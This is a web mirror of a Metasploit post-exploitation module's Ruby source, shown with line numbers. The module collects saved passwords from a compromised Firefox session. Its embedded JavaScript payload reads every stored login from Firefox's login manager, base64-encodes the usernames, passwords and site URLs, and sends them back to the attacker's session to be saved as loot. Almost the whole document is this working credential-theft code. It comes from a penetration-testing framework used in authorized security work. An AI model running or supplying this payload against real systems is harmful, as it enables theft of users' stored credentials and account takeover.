Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/firefox/gather/passwords.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'json'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Payload::Firefox

10
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Firefox Gather Passwords from Privileged JavaScript Shell',

17
        'Description' => %q{

18
          This module allows collection of passwords from a Firefox Privileged JavaScript Shell.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [ 'joev' ],

22
        'DisclosureDate' => '2014-04-11',

23
        'Notes' => {

24
          'Stability' => [CRASH_SAFE],

25
          'SideEffects' => [],

26
          'Reliability' => []

27
        }

28
      )

29
    )

30


31
    register_options([

32
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

33
    ])

34
  end

35


36
  def run

37
    results = js_exec(js_payload)

38
    if results.present?

39
      begin

40
        passwords = JSON.parse(results)

41
        passwords.each do |entry|

42
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }

43
        end

44


45
        if !passwords.empty?

46
          file = store_loot('firefox.passwords.json', 'text/json', rhost, passwords.to_json)

47
          print_good("Saved #{passwords.length} passwords to #{file}")

48
        else

49
          print_warning('No passwords were found in Firefox.')

50
        end

51
      rescue JSON::ParserError

52
        print_warning(results)

53
      end

54
    end

55
  end

56


57
  def js_payload

58
    %|

59
      (function(send){

60
        try {

61
          var manager = Components

62
                          .classes["@mozilla.org/login-manager;1"]

63
                          .getService(Components.interfaces.nsILoginManager);

64
          var logins = manager.getAllLogins();

65
          var passwords = [];

66
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;

67
          var fields = ['password', 'passwordField', 'username', 'usernameField',

68
                        'httpRealm', 'formSubmitURL', 'hostname'];

69


70
          var sanitize = function(passwdObj) {

71
            var sanitized = { };

72
            for (var i in fields) {

73
              sanitized[fields[i]] = b64(passwdObj[fields[i]]);

74
            }

75
            return sanitized;

76
          }

77


78
          // Find user from returned array of nsILoginInfo objects

79
          for (var i = 0; i < logins.length; i++) {

80
            passwords.push(sanitize(logins[i]));

81
          }

82


83
          send(JSON.stringify(passwords));

84
        } catch (e) {

85
          send(e);

86
        }

87
      })(this.send);

88
    |.strip

89
  end

90
end

91


92